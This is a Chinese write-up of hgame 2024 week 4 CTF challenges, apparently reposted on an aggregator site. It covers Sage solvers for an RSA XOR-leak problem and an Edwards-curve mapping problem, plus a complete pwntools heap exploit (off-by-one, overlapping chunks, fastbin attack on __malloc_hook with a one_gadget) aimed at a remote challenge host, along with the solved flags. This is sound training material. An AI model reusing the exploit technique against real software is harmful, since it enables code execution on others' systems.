[hgame 2024 week4] crypto/pwn

本文主要是介绍[hgame 2024 week4] crypto/pwn，希望对大家解决编程问题提供一定的参考价值，需要的开发者们随着小编来一起学习吧！

第四周有点凑数了吧，只有两个密码一个pwn

crypto/lastRSA

RSA题，泄露leak0=p^(q>>13)其实还是个异或的题，不过leak0没有直接给，而是给了两个式子：

enc1 = 2024+sum([(leak0+2t)**i for i in range(40)]);leak1 = 2024+sum([(leak0*2*t)**i for i in range(40)])

from Crypto.Util.number import *
from secret import flagdef encrypt(P,k,leak0):round=40t=114514x= leak0+2*t if k==1 else 2*t*leak0enc=2024while(round):enc+=pow(x,round,P)round-=1return encm=bytes_to_long(flag)
p=getStrongPrime(512)
q=getStrongPrime(512)
assert len(bin(p)[2:])==512 and len(bin(q)[2:])==512
e=0x10001
leak0=p^(q>>13)
n=p*q
enc1=encrypt(n,1,leak0)
enc2=encrypt(n,0,leak0)
c=pow(m,e,n)print(f"enc1={enc1}")
print(f"enc2={enc2}")
print(f"c={c}")
print(f"n={n}")enc1=2481998981478152169164378674194911111475668734496914731682204172873045273889232856266140236518231314247189371709204253066552650323964534117750428068488816244218804456399611481184330258906749484831445348350172666468738790766815099309565494384945826796034182837505953580660530809234341340618365003203562639721024   
enc2=2892413486487317168909532087203213279451225676278514499452279887449096190436834627119161155437012153025493797437822039637248773941097619806471091066094500182219982742574131816371999183859939231601667171386686480639682179794271743863617494759526428080527698539121555583797116049103918578087014860597240690299394   
c=87077759878060225287052106938097622158896106278756852778571684429767457761148474369973882278847307769690207029595557915248044823659812747567906459417733553420521047767697402135115530660537769991893832879721828034794560921646691417429690920199537846426396918932533649132260605985848584545112232670451169040592        
n=136159501395608246592433283541763642196295827652290287729738751327141687762873360488671062583851846628664067117347340297084457474032286451582225574885517757497232577841944028986878525656103449482492190400477852995620473233002547925192690737520592206832895895025277841872025718478827192193010765543046480481871       

前边用过half-gcd挺好用，还可以用它来处理

def HGCD(a, b):if 2 * b.degree() <= a.degree() or a.degree() == 1:return 1, 0, 0, 1m = a.degree() // 2a_top, a_bot = a.quo_rem(x^m)b_top, b_bot = b.quo_rem(x^m)R00, R01, R10, R11 = HGCD(a_top, b_top)c = R00 * a + R01 * bd = R10 * a + R11 * bq, e = c.quo_rem(d)d_top, d_bot = d.quo_rem(x^(m // 2))e_top, e_bot = e.quo_rem(x^(m // 2))S00, S01, S10, S11 = HGCD(d_top, e_top)RET00 = S01 * R00 + (S00 - q * S01) * R10RET01 = S01 * R01 + (S00 - q * S01) * R11RET10 = S11 * R00 + (S10 - q * S11) * R10RET11 = S11 * R01 + (S10 - q * S11) * R11return RET00, RET01, RET10, RET11def GCD(a, b):print(a.degree(), b.degree())q, r = a.quo_rem(b)if r == 0:return bR00, R01, R10, R11 = HGCD(a, b)c = R00 * a + R01 * bd = R10 * a + R11 * bif d == 0:return c.monic()q, r = c.quo_rem(d)if r == 0:return dreturn GCD(d, r)R.<x> = PolynomialRing(Zmod(n))
f1 = 2024 - enc1 
f2 = 2024 - enc2 
round = 40
t = 114514
while round:f1 += (x+2*t)^roundf2 += (x*2*t)^round round -=1 res = GCD(f1,f2)
#28393836724335847406168052814976215060399242861827153552938236205089198916166528481100104530682246199141916591570629704088736305620999506131274301622361617976022832290062433571111462778545024922816992931277078614259243378951336783503642137346321436986637570556289645880954074511024998016524574105232777874805*x + 120632369046464979337007116468860969996455300258370533226998068511279455859669092886318838843786805055292593205873249745062007838214676151227222096195178561205347558947214860070654611046274320182948148041334819353126761665121503104776690848826835227902147652138484673364067729149954700848676864573412031788032leak0 = 13168452015078389807681744077701012683188749953280204324570483361963541298704796389757190180549802771265899020301416729606658667351017116721327316272373584

然后再爆破，p^q的程序基本不需要动，只是改下位数和p头

gift = leak0 
N = n PR.<x> = PolynomialRing(Zmod(N))
ok = False
def pq_xor(tp,tq,idx):global ok if ok:return if tp*tq>N:return if (tp+(2<<idx))*(tq+(2<<(idx+13)))<N:return if idx<=100:try:f = tp + x rr = f.monic().small_roots(X=2^100, beta=0.4)if rr != []:print(rr)print(tp)print('p = ',f(rr[0]))ok = Truereturnexcept:passreturnidx -=1b = (gift >>idx)&1one = 1<<idx oneq = 1<<(idx+13)if b==0:pq_xor(tp,tq,idx)    pq_xor(tp+one,tq+oneq,idx)    else:   #1pq_xor(tp+one,tq,idx)pq_xor(tp,tq+oneq,idx)tq = 1<<511
tp = ((leak0>>499)^1)<<499
pq_xor(tp,tq,498)p =  13167244882304693277785720567493996610066918256369682594482416913362069704726831109204371100970154866396462315730687841430922916219416627940866383413192931
q = n//p 
m = pow(c,inverse_mod(0x10001, (p-1)*(q-1)),n)
long_to_bytes(int(m))
#hgame{Gr0bn3r_ba3ic_0ften_w0rk3_w0nd3rs}

crypto/transfermation

这个跟前边的sictf的一个题几乎一样，都是爱得华兹曲线在1的情况下与椭圆曲线映射的问题，只是这个题最后还需要映射爱德华兹曲线上。

from Crypto.Util.number import *
from secret import Curve,gx,gy# flag = "hgame{" + hex(gx+gy)[2:] + "}"def ison(C, P):c, d, p = Cu, v = Preturn (u**2 + v**2 - c**2 * (1 + d * u**2*v**2)) % p == 0def add(C, P, Q):c, d, p = Cu1, v1 = Pu2, v2 = Qassert ison(C, P) and ison(C, Q)u3 = (u1 * v2 + v1 * u2) * inverse(c * (1 + d * u1 * u2 * v1 * v2), p) % pv3 = (v1 * v2 - u1 * u2) * inverse(c * (1 - d * u1 * u2 * v1 * v2), p) % preturn (int(u3), int(v3))def mul(C, P, m):assert ison(C, P)c, d, p = CB = bin(m)[2:]l = len(B)u, v = PPP = (-u, v)O = add(C, P, PP)Q = Oif m == 0:return Oelif m == 1:return Pelse:for _ in range(l-1):P = add(C, P, P)m = m - 2**(l-1)Q, P = P, (u, v)return add(C, Q, mul(C, P, m))c, d, p = CurveG = (gx, gy)
P = (423323064726997230640834352892499067628999846, 44150133418579337991209313731867512059107422186218072084511769232282794765835)
Q = (1033433758780986378718784935633168786654735170, 2890573833121495534597689071280547153773878148499187840022524010636852499684)
S = (875772166783241503962848015336037891993605823, 51964088188556618695192753554835667051669568193048726314346516461990381874317)
T = (612403241107575741587390996773145537915088133, 64560350111660175566171189050923672010957086249856725096266944042789987443125)
assert ison(Curve, P) and ison(Curve, Q) and ison(Curve, G)
e = 0x10001
print(f"eG = {mul(Curve, G, e)}")#eG = (40198712137747628410430624618331426343875490261805137714686326678112749070113, 65008030741966083441937593781739493959677657609550411222052299176801418887407)

解法套模板，先通过4个点求参数（与那个题一样，这里有c是两个值，在求出结果后分别试试）

#通过曲线上的4点求参数
P = (423323064726997230640834352892499067628999846, 44150133418579337991209313731867512059107422186218072084511769232282794765835)
Q = (1033433758780986378718784935633168786654735170, 2890573833121495534597689071280547153773878148499187840022524010636852499684)
S = (875772166783241503962848015336037891993605823, 51964088188556618695192753554835667051669568193048726314346516461990381874317)
T = (612403241107575741587390996773145537915088133, 64560350111660175566171189050923672010957086249856725096266944042789987443125)
PR.<c,d> = PolynomialRing(ZZ)
F = [v[0]^2 + v[1]^2 - c^2*(1+d*v[0]^2*v[1]^2) for v in [P,Q,S,T]]
res = ideal(F).groebner_basis()
#[c^2 + 55035035862773596757724513019504552123843780200057245245581766079309471393995, d + 59163782230252684822841652225303740075401079121772957375715728037523200623623, 67943764351073247630101943221474884302015437788242536572067548198498727238923]
p = 67943764351073247630101943221474884302015437788242536572067548198498727238923
d = -59163782230252684822841652225303740075401079121772957375715728037523200623623%p 
c2 = -55035035862773596757724513019504552123843780200057245245581766079309471393995%p PR.<x> = PolynomialRing(Zmod(p))
f = x^2 - c2 
f.roots()
#[(60799864652963819347231403856892915722262395658296749944775205023739430037843,  1), (7143899698109428282870539364581968579753042129945786627292343174759297201080,  1)]

先映射到椭圆曲线上求逆再代回爱曲线

c = 60799864652963819347231403856892915722262395658296749944775205023739430037843
#c = 7143899698109428282870539364581968579753042129945786627292343174759297201080#映射到椭圆曲线
#part2 map to ECC
PR.<z> = PolynomialRing(Zmod(p))
aa = 1
dd = (d*c^4)%p
J = (2*(aa+dd)*inverse_mod(aa-dd,p))%p
K = (4*inverse_mod(aa-dd,p))%p
A = ((3-J^2)*inverse_mod(3*K^2,p))%p
B = ((2*J^3-9*J)*inverse_mod(27*K^3,p))%pfor i in  PR(z^3+A*z+B).roots():alpha = int(i[0])for j in PR(z^2-(3*alpha^2+A)).roots():s = int(j[0])s = inverse_mod(s, p)if J==alpha*3*s%p:Alpha = alphaS = sdef twist_to_weier(x,y):v = x*inverse_mod(c,p)%pw = y*inverse_mod(c,p)%passert (aa*v^2+w^2)%p==(1+dd*v^2*w^2)%ps = (1+w)*inverse_mod(1-w,p)%pt = s*inverse_mod(v,p)%passert (K*t^2)%p==(s^3+J*s^2+s)%pxW = (3*s+J) * inverse_mod(3*K, p) % pyW = t * inverse_mod(K, p) % passert yW^2 % p == (xW^3+A*xW+B) % preturn (xW,yW)def weier_to_twist(x,y):xM=S*(x-Alpha)%pyM=S*y%passert (K*yM^2)%p==(xM^3+J*xM^2+xM)%pxe = xM*inverse(yM,p)%pye = (xM-1)*inverse(xM+1,p)%passert (aa*xe^2+ye^2)%p==(1+dd*xe^2*ye^2)%pxq = xe*c%pyq = ye*c%passert (a*xq^2+yq^2)%p==c^2*(1+d*xq^2*yq^2)%preturn (xq,yq)E = EllipticCurve(GF(p), [A, B])
EG = E(twist_to_weier(eG[0],eG[1]))
o = E.order()
d = inverse_mod(0x10001,o)
G = d*EG 
#G = (49338299923900164306056143014992557349642478113076310967105225637960726019403 : 3746395175077030354020488043970072705075875018302778769259157124252617333772 : 1)
#G = (35733349967727579207362409511868045188603684677107507326049720528422212540295 : 6262749945313057631927156406870959025196549376410411046740120315141730009195 : 1)
G = (49338299923900164306056143014992557349642478113076310967105225637960726019403,3746395175077030354020488043970072705075875018302778769259157124252617333772)
gx,gy = weier_to_twist(G[0],G[1])
"hgame{" + hex(gx+gy)[2:] + "}"
#hgame{755cdf67af575370c4b4e54cd0e7159cdaabd80909897634b00d4ed7bef5d957}
#hgame{5cd8f34105f97cc6470cf21cc5d0c1be280764b8a9f0e3e35542ac41ba2c17f2}

pwn/EldenRingFinal

libc2.23确实太老了

在read里有个off_by_one可以多读1字节，建块时有管理块0x20和数据块。可处理19次

先建两个0x20的free以后再建大点的块，让数据块都相邻，然后利用溢出的1字节改下一块的头，释放得到重叠块，然后就是fastbin attack在malloc_hook-0x23利用错位建块写one

from pwn import *context(arch='amd64', log_level='debug')
elf = ELF('./vuln')
libc = ELF('./libc-2.23.so')#p = process('./vuln')
p = remote('47.102.184.100', 30701)def add(size, msg=b'A'):p.sendlineafter(b'>\n', b'3')p.sendlineafter(b'>\n', b'0') #page 0p.sendlineafter(b'size:\n>\n', str(size).encode()) #np.sendafter(b"content:\n>\n", msg)def free(idx):p.sendlineafter(b'>\n', b'4')p.sendlineafter(b'>\n', b'0') #page 0p.sendlineafter(b"which note_ID would you like to delete?\n>\n", str(idx).encode()) def add2(size, msg=b'A'):p.sendlineafter(b'>', b'3')p.sendlineafter(b'>', b'0') #page 0p.sendlineafter(b'size:\n>', str(size).encode()) #np.sendafter(b"content:\n>", msg)def free2(idx):p.sendlineafter(b'>', b'4')p.sendlineafter(b'>', b'0') #page 0p.sendlineafter(b"which note_ID would you like to delete?\n>", str(idx).encode()) #30 30 30 30 20 20 70 20
add(0x20)
add(0x20)
free(1)
free(2)add(0x10)
add(0x10)
add(0x60, b'A'*0x18+p64(0x51)) #
add(0x10)free(1)
add(0x18, b'A'*0x18 + p8(0x91)) #5 off_by_one修改2块头为0x91释放到unsort
free(3)
free(2)
add(0x10) #6  unsort 70 -> main_arenafree(5)
add(0x18, b'A'*0x18 + p8(0x41)) #7
free(6)
add(0x30, b'A'*0x18 + p64(0x71)+ p16(0x45dd)) #8add(0x60) #9
add(0x60, b'\x00'*(3+0x30)+flat(0xfbad38c0,0,0,0)+p8(0)) #10
p.recv(0x40)
libc.address = u64(p.recv(8)) - 0x3c4600
print(f"{libc.address = :x}")free2(7)
add2(0x18, b'A'*0x18+ p64(0x51)) #11
free2(8)
add2(0x40, b'B'*0x18+ p64(0x71)) #12
free2(9)
free2(12)
add2(0x40, b'C'*0x18+p64(0x71) + p64(libc.sym['__malloc_hook'] - 0x23)) #13
add2(0x60)one = [0x45206, 0x4525a, 0xef9f4, 0xf0897 ]add2(0x60, b'AAA'+ flat(0,0,libc.address+one[2]))p.sendlineafter(b'>', b'3')
p.sendlineafter(b'>', b'0') #page 0
p.sendlineafter(b'size:\n>', b'88') #np.interactive()
#hgame{aea7c6da12f48638b75ccd128d67b169e6510ade}

这篇关于[hgame 2024 week4] crypto/pwn的文章就介绍到这儿，希望我们推荐的文章对编程师们有所帮助！

---